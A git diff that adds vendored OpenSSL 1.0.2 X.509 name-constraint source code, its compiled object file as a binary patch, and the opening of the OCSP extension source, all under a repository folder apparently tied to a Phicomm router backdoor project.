diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ncons.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ncons.c
new file mode 100644
index 0000000..b97ed27
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ncons.c
@@ -0,0 +1,477 @@
+/* v3_ncons.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static void *v2i_NAME_CONSTRAINTS(const X509V3_EXT_METHOD *method,
+                                  X509V3_CTX *ctx,
+                                  STACK_OF(CONF_VALUE) *nval);
+static int i2r_NAME_CONSTRAINTS(const X509V3_EXT_METHOD *method, void *a,
+                                BIO *bp, int ind);
+static int do_i2r_name_constraints(const X509V3_EXT_METHOD *method,
+                                   STACK_OF(GENERAL_SUBTREE) *trees, BIO *bp,
+                                   int ind, char *name);
+static int print_nc_ipadd(BIO *bp, ASN1_OCTET_STRING *ip);
+
+static int nc_match(GENERAL_NAME *gen, NAME_CONSTRAINTS *nc);
+static int nc_match_single(GENERAL_NAME *sub, GENERAL_NAME *gen);
+static int nc_dn(X509_NAME *sub, X509_NAME *nm);
+static int nc_dns(ASN1_IA5STRING *sub, ASN1_IA5STRING *dns);
+static int nc_email(ASN1_IA5STRING *sub, ASN1_IA5STRING *eml);
+static int nc_uri(ASN1_IA5STRING *uri, ASN1_IA5STRING *base);
+
+const X509V3_EXT_METHOD v3_name_constraints = {
+    NID_name_constraints, 0,
+    ASN1_ITEM_ref(NAME_CONSTRAINTS),
+    0, 0, 0, 0,
+    0, 0,
+    0, v2i_NAME_CONSTRAINTS,
+    i2r_NAME_CONSTRAINTS, 0,
+    NULL
+};
+
+ASN1_SEQUENCE(GENERAL_SUBTREE) = {
+        ASN1_SIMPLE(GENERAL_SUBTREE, base, GENERAL_NAME),
+        ASN1_IMP_OPT(GENERAL_SUBTREE, minimum, ASN1_INTEGER, 0),
+        ASN1_IMP_OPT(GENERAL_SUBTREE, maximum, ASN1_INTEGER, 1)
+} ASN1_SEQUENCE_END(GENERAL_SUBTREE)
+
+ASN1_SEQUENCE(NAME_CONSTRAINTS) = {
+        ASN1_IMP_SEQUENCE_OF_OPT(NAME_CONSTRAINTS, permittedSubtrees,
+                                                        GENERAL_SUBTREE, 0),
+        ASN1_IMP_SEQUENCE_OF_OPT(NAME_CONSTRAINTS, excludedSubtrees,
+                                                        GENERAL_SUBTREE, 1),
+} ASN1_SEQUENCE_END(NAME_CONSTRAINTS)
+
+
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(GENERAL_SUBTREE)
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(NAME_CONSTRAINTS)
+
+static void *v2i_NAME_CONSTRAINTS(const X509V3_EXT_METHOD *method,
+                                  X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval)
+{
+    int i;
+    CONF_VALUE tval, *val;
+    STACK_OF(GENERAL_SUBTREE) **ptree = NULL;
+    NAME_CONSTRAINTS *ncons = NULL;
+    GENERAL_SUBTREE *sub = NULL;
+    ncons = NAME_CONSTRAINTS_new();
+    if (!ncons)
+        goto memerr;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        val = sk_CONF_VALUE_value(nval, i);
+        if (!strncmp(val->name, "permitted", 9) && val->name[9]) {
+            ptree = &ncons->permittedSubtrees;
+            tval.name = val->name + 10;
+        } else if (!strncmp(val->name, "excluded", 8) && val->name[8]) {
+            ptree = &ncons->excludedSubtrees;
+            tval.name = val->name + 9;
+        } else {
+            X509V3err(X509V3_F_V2I_NAME_CONSTRAINTS, X509V3_R_INVALID_SYNTAX);
+            goto err;
+        }
+        tval.value = val->value;
+        sub = GENERAL_SUBTREE_new();
+        if (!v2i_GENERAL_NAME_ex(sub->base, method, ctx, &tval, 1))
+            goto err;
+        if (!*ptree)
+            *ptree = sk_GENERAL_SUBTREE_new_null();
+        if (!*ptree || !sk_GENERAL_SUBTREE_push(*ptree, sub))
+            goto memerr;
+        sub = NULL;
+    }
+
+    return ncons;
+
+ memerr:
+    X509V3err(X509V3_F_V2I_NAME_CONSTRAINTS, ERR_R_MALLOC_FAILURE);
+ err:
+    if (ncons)
+        NAME_CONSTRAINTS_free(ncons);
+    if (sub)
+        GENERAL_SUBTREE_free(sub);
+
+    return NULL;
+}
+
+static int i2r_NAME_CONSTRAINTS(const X509V3_EXT_METHOD *method, void *a,
+                                BIO *bp, int ind)
+{
+    NAME_CONSTRAINTS *ncons = a;
+    do_i2r_name_constraints(method, ncons->permittedSubtrees,
+                            bp, ind, "Permitted");
+    do_i2r_name_constraints(method, ncons->excludedSubtrees,
+                            bp, ind, "Excluded");
+    return 1;
+}
+
+static int do_i2r_name_constraints(const X509V3_EXT_METHOD *method,
+                                   STACK_OF(GENERAL_SUBTREE) *trees,
+                                   BIO *bp, int ind, char *name)
+{
+    GENERAL_SUBTREE *tree;
+    int i;
+    if (sk_GENERAL_SUBTREE_num(trees) > 0)
+        BIO_printf(bp, "%*s%s:\n", ind, "", name);
+    for (i = 0; i < sk_GENERAL_SUBTREE_num(trees); i++) {
+        tree = sk_GENERAL_SUBTREE_value(trees, i);
+        BIO_printf(bp, "%*s", ind + 2, "");
+        if (tree->base->type == GEN_IPADD)
+            print_nc_ipadd(bp, tree->base->d.ip);
+        else
+            GENERAL_NAME_print(bp, tree->base);
+        BIO_puts(bp, "\n");
+    }
+    return 1;
+}
+
+static int print_nc_ipadd(BIO *bp, ASN1_OCTET_STRING *ip)
+{
+    int i, len;
+    unsigned char *p;
+    p = ip->data;
+    len = ip->length;
+    BIO_puts(bp, "IP:");
+    if (len == 8) {
+        BIO_printf(bp, "%d.%d.%d.%d/%d.%d.%d.%d",
+                   p[0], p[1], p[2], p[3], p[4], p[5], p[6], p[7]);
+    } else if (len == 32) {
+        for (i = 0; i < 16; i++) {
+            BIO_printf(bp, "%X", p[0] << 8 | p[1]);
+            p += 2;
+            if (i == 7)
+                BIO_puts(bp, "/");
+            else if (i != 15)
+                BIO_puts(bp, ":");
+        }
+    } else
+        BIO_printf(bp, "IP Address:<invalid>");
+    return 1;
+}
+
+/*-
+ * Check a certificate conforms to a specified set of constraints.
+ * Return values:
+ *  X509_V_OK: All constraints obeyed.
+ *  X509_V_ERR_PERMITTED_VIOLATION: Permitted subtree violation.
+ *  X509_V_ERR_EXCLUDED_VIOLATION: Excluded subtree violation.
+ *  X509_V_ERR_SUBTREE_MINMAX: Min or max values present and matching type.
+ *  X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE:  Unsupported constraint type.
+ *  X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX: bad unsupported constraint syntax.
+ *  X509_V_ERR_UNSUPPORTED_NAME_SYNTAX: bad or unsupported syntax of name
+ */
+
+int NAME_CONSTRAINTS_check(X509 *x, NAME_CONSTRAINTS *nc)
+{
+    int r, i;
+    X509_NAME *nm;
+
+    nm = X509_get_subject_name(x);
+
+    if (X509_NAME_entry_count(nm) > 0) {
+        GENERAL_NAME gntmp;
+        gntmp.type = GEN_DIRNAME;
+        gntmp.d.directoryName = nm;
+
+        r = nc_match(&gntmp, nc);
+
+        if (r != X509_V_OK)
+            return r;
+
+        gntmp.type = GEN_EMAIL;
+
+        /* Process any email address attributes in subject name */
+
+        for (i = -1;;) {
+            X509_NAME_ENTRY *ne;
+            i = X509_NAME_get_index_by_NID(nm, NID_pkcs9_emailAddress, i);
+            if (i == -1)
+                break;
+            ne = X509_NAME_get_entry(nm, i);
+            gntmp.d.rfc822Name = X509_NAME_ENTRY_get_data(ne);
+            if (gntmp.d.rfc822Name->type != V_ASN1_IA5STRING)
+                return X509_V_ERR_UNSUPPORTED_NAME_SYNTAX;
+
+            r = nc_match(&gntmp, nc);
+
+            if (r != X509_V_OK)
+                return r;
+        }
+
+    }
+
+    for (i = 0; i < sk_GENERAL_NAME_num(x->altname); i++) {
+        GENERAL_NAME *gen = sk_GENERAL_NAME_value(x->altname, i);
+        r = nc_match(gen, nc);
+        if (r != X509_V_OK)
+            return r;
+    }
+
+    return X509_V_OK;
+
+}
+
+static int nc_match(GENERAL_NAME *gen, NAME_CONSTRAINTS *nc)
+{
+    GENERAL_SUBTREE *sub;
+    int i, r, match = 0;
+
+    /*
+     * Permitted subtrees: if any subtrees exist of matching the type at
+     * least one subtree must match.
+     */
+
+    for (i = 0; i < sk_GENERAL_SUBTREE_num(nc->permittedSubtrees); i++) {
+        sub = sk_GENERAL_SUBTREE_value(nc->permittedSubtrees, i);
+        if (gen->type != sub->base->type)
+            continue;
+        if (sub->minimum || sub->maximum)
+            return X509_V_ERR_SUBTREE_MINMAX;
+        /* If we already have a match don't bother trying any more */
+        if (match == 2)
+            continue;
+        if (match == 0)
+            match = 1;
+        r = nc_match_single(gen, sub->base);
+        if (r == X509_V_OK)
+            match = 2;
+        else if (r != X509_V_ERR_PERMITTED_VIOLATION)
+            return r;
+    }
+
+    if (match == 1)
+        return X509_V_ERR_PERMITTED_VIOLATION;
+
+    /* Excluded subtrees: must not match any of these */
+
+    for (i = 0; i < sk_GENERAL_SUBTREE_num(nc->excludedSubtrees); i++) {
+        sub = sk_GENERAL_SUBTREE_value(nc->excludedSubtrees, i);
+        if (gen->type != sub->base->type)
+            continue;
+        if (sub->minimum || sub->maximum)
+            return X509_V_ERR_SUBTREE_MINMAX;
+
+        r = nc_match_single(gen, sub->base);
+        if (r == X509_V_OK)
+            return X509_V_ERR_EXCLUDED_VIOLATION;
+        else if (r != X509_V_ERR_PERMITTED_VIOLATION)
+            return r;
+
+    }
+
+    return X509_V_OK;
+
+}
+
+static int nc_match_single(GENERAL_NAME *gen, GENERAL_NAME *base)
+{
+    switch (base->type) {
+    case GEN_DIRNAME:
+        return nc_dn(gen->d.directoryName, base->d.directoryName);
+
+    case GEN_DNS:
+        return nc_dns(gen->d.dNSName, base->d.dNSName);
+
+    case GEN_EMAIL:
+        return nc_email(gen->d.rfc822Name, base->d.rfc822Name);
+
+    case GEN_URI:
+        return nc_uri(gen->d.uniformResourceIdentifier,
+                      base->d.uniformResourceIdentifier);
+
+    default:
+        return X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE;
+    }
+
+}
+
+/*
+ * directoryName name constraint matching. The canonical encoding of
+ * X509_NAME makes this comparison easy. It is matched if the subtree is a
+ * subset of the name.
+ */
+
+static int nc_dn(X509_NAME *nm, X509_NAME *base)
+{
+    /* Ensure canonical encodings are up to date.  */
+    if (nm->modified && i2d_X509_NAME(nm, NULL) < 0)
+        return X509_V_ERR_OUT_OF_MEM;
+    if (base->modified && i2d_X509_NAME(base, NULL) < 0)
+        return X509_V_ERR_OUT_OF_MEM;
+    if (base->canon_enclen > nm->canon_enclen)
+        return X509_V_ERR_PERMITTED_VIOLATION;
+    if (memcmp(base->canon_enc, nm->canon_enc, base->canon_enclen))
+        return X509_V_ERR_PERMITTED_VIOLATION;
+    return X509_V_OK;
+}
+
+static int nc_dns(ASN1_IA5STRING *dns, ASN1_IA5STRING *base)
+{
+    char *baseptr = (char *)base->data;
+    char *dnsptr = (char *)dns->data;
+    /* Empty matches everything */
+    if (!*baseptr)
+        return X509_V_OK;
+    /*
+     * Otherwise can add zero or more components on the left so compare RHS
+     * and if dns is longer and expect '.' as preceding character.
+     */
+    if (dns->length > base->length) {
+        dnsptr += dns->length - base->length;
+        if (*baseptr != '.' && dnsptr[-1] != '.')
+            return X509_V_ERR_PERMITTED_VIOLATION;
+    }
+
+    if (strcasecmp(baseptr, dnsptr))
+        return X509_V_ERR_PERMITTED_VIOLATION;
+
+    return X509_V_OK;
+
+}
+
+static int nc_email(ASN1_IA5STRING *eml, ASN1_IA5STRING *base)
+{
+    const char *baseptr = (char *)base->data;
+    const char *emlptr = (char *)eml->data;
+
+    const char *baseat = strchr(baseptr, '@');
+    const char *emlat = strchr(emlptr, '@');
+    if (!emlat)
+        return X509_V_ERR_UNSUPPORTED_NAME_SYNTAX;
+    /* Special case: inital '.' is RHS match */
+    if (!baseat && (*baseptr == '.')) {
+        if (eml->length > base->length) {
+            emlptr += eml->length - base->length;
+            if (!strcasecmp(baseptr, emlptr))
+                return X509_V_OK;
+        }
+        return X509_V_ERR_PERMITTED_VIOLATION;
+    }
+
+    /* If we have anything before '@' match local part */
+
+    if (baseat) {
+        if (baseat != baseptr) {
+            if ((baseat - baseptr) != (emlat - emlptr))
+                return X509_V_ERR_PERMITTED_VIOLATION;
+            /* Case sensitive match of local part */
+            if (strncmp(baseptr, emlptr, emlat - emlptr))
+                return X509_V_ERR_PERMITTED_VIOLATION;
+        }
+        /* Position base after '@' */
+        baseptr = baseat + 1;
+    }
+    emlptr = emlat + 1;
+    /* Just have hostname left to match: case insensitive */
+    if (strcasecmp(baseptr, emlptr))
+        return X509_V_ERR_PERMITTED_VIOLATION;
+
+    return X509_V_OK;
+
+}
+
+static int nc_uri(ASN1_IA5STRING *uri, ASN1_IA5STRING *base)
+{
+    const char *baseptr = (char *)base->data;
+    const char *hostptr = (char *)uri->data;
+    const char *p = strchr(hostptr, ':');
+    int hostlen;
+    /* Check for foo:// and skip past it */
+    if (!p || (p[1] != '/') || (p[2] != '/'))
+        return X509_V_ERR_UNSUPPORTED_NAME_SYNTAX;
+    hostptr = p + 3;
+
+    /* Determine length of hostname part of URI */
+
+    /* Look for a port indicator as end of hostname first */
+
+    p = strchr(hostptr, ':');
+    /* Otherwise look for trailing slash */
+    if (!p)
+        p = strchr(hostptr, '/');
+
+    if (!p)
+        hostlen = strlen(hostptr);
+    else
+        hostlen = p - hostptr;
+
+    if (hostlen == 0)
+        return X509_V_ERR_UNSUPPORTED_NAME_SYNTAX;
+
+    /* Special case: inital '.' is RHS match */
+    if (*baseptr == '.') {
+        if (hostlen > base->length) {
+            p = hostptr + hostlen - base->length;
+            if (!strncasecmp(p, baseptr, base->length))
+                return X509_V_OK;
+        }
+        return X509_V_ERR_PERMITTED_VIOLATION;
+    }
+
+    if ((base->length != (int)hostlen)
+        || strncasecmp(hostptr, baseptr, hostlen))
+        return X509_V_ERR_PERMITTED_VIOLATION;
+
+    return X509_V_OK;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ncons.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ncons.o
new file mode 100644
index 0000000000000000000000000000000000000000..0a08cd8f241947930d5c186ee54e7b5c1d844301
GIT binary patch
literal 9464
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
MkX|&h{N3FD-@MpY5&!@I

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ocsp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ocsp.c
new file mode 100644
index 0000000..b151eac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ocsp.c
@@ -0,0 +1,312 @@
+/* v3_ocsp.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef OPENSSL_NO_OCSP
+
+# include <stdio.h>
+# include "cryptlib.h"
+# include <openssl/conf.h>
+# include <openssl/asn1.h>
